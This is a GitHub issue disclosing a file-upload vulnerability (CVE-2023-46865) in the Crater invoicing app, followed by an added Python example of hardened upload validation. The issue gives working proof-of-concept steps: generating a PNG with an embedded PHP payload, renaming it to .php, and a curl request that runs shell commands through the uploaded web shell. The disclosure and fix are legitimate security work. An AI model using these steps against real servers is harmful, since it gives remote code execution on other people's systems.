Open asylumdx opened 8 months ago
@asylumdx Have they still not responded!? Thanks for raising this. That being said, the software appears to be abandonware, since the promise of security maintenance is not being upheld.
Have you tried emailing them? In case you haven't, here are the instructions: https://github.com/crater-invoice/crater/security/policy
@rihards-simanovics I reached out to them on Discord in April and they responded then. I'm sure they are aware of it by now.
@mohitpanjwani please review.
This vulnerability has been assigned CVE-2023-46865, credit to my colleagues at NetbyteSEC for helping with the exploit.
Description
This is a responsible disclosure. I contacted the maintainers through huntr.dev in April and they acknowledged the vulnerability, but the project seems to have been in maintenance for almost a year. I've given them 5 months to fix it (they didn't respond after acknowledging it) and think I should let others be aware of this.
Describe the bug
In the latest or 6.0.6 version of Crater, a superadmin is able to upload a PHP file instead of an image using the Company Logo upload feature. The Base64Mime.php checking function can be bypassed by embedding a valid PHP payload into an IDAT image chunk. I used https://github.com/huntergregal/PNG-IDAT-Payload-Generator for the PoC.
python3 .\generate.py -m php -o test.png
Then use a superadmin account to upload it, changing .png to .php in Burp.
Then
curl -XPOST -d '1=uname -a' 'http://localhost/storage/1/test.php?0=shell_exec' --output o && cat o
Expected behavior
PHP files shouldn't be allowed to be uploaded. An extension whitelist should be used to prevent execution of PHP files.
Please complete the following information:
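The root cause described above is a content-only check (valid image bytes) paired with a client-controlled filename extension. The following is an added example, not Crater's code, showing that pattern next to a hardened validator that allowlists the extension, requires it to agree with the sniffed content and stores the file under a server-generated name; the signature table and sample inputs are constructed for this illustration.

```python
import os
import secrets

# Allowlist of image formats a logo upload may carry (constructed for this
# example, not Crater's own table): leading magic bytes -> canonical extension.
IMAGE_SIGNATURES = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif"}

# Constructed sample inputs (not real files): a bare PNG signature plus padding,
# and a blob that is not an image at all.
SAMPLE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00\x00\x00\rIHDR" + b"\x00" * 17
SAMPLE_TEXT = b"not an image at all"

def sniff_image_type(data: bytes):
    """Return the image type implied by the leading bytes, or None."""
    for magic, kind in IMAGE_SIGNATURES.items():
        if data.startswith(magic):
            return kind
    return None

def naive_accepts(client_name: str, data: bytes) -> bool:
    """Content-only check, the pattern bypassed in this report: valid PNG
    bytes pass even when the client names the file test.php."""
    return sniff_image_type(data) is not None

def validate_logo_upload(client_name: str, data: bytes) -> str:
    """Hardened check: allowlist the client extension, require it to agree
    with the sniffed content, and return a server-generated storage name."""
    ext = os.path.splitext(client_name)[1].lower().lstrip(".")
    if ext not in ALLOWED_EXTENSIONS:
        raise ValueError(f"extension not allowed: {ext!r}")
    kind = sniff_image_type(data)
    if kind is None:
        raise ValueError("content is not a supported image")
    if kind != ("jpg" if ext == "jpeg" else ext):
        raise ValueError(f"extension {ext!r} does not match content {kind!r}")
    # The stored extension comes from the sniffed type, never from the request.
    return f"{secrets.token_hex(16)}.{kind}"

def is_accepted(client_name: str, data: bytes) -> bool:
    """Yes/no wrapper around validate_logo_upload for callers and tests."""
    try:
        validate_logo_upload(client_name, data)
        return True
    except ValueError:
        return False
```

Because the IDAT technique keeps the file a valid image, content sniffing alone can never catch it; the extension allowlist plus serving uploads from a location the web server does not hand to the PHP interpreter are the controls that actually matter.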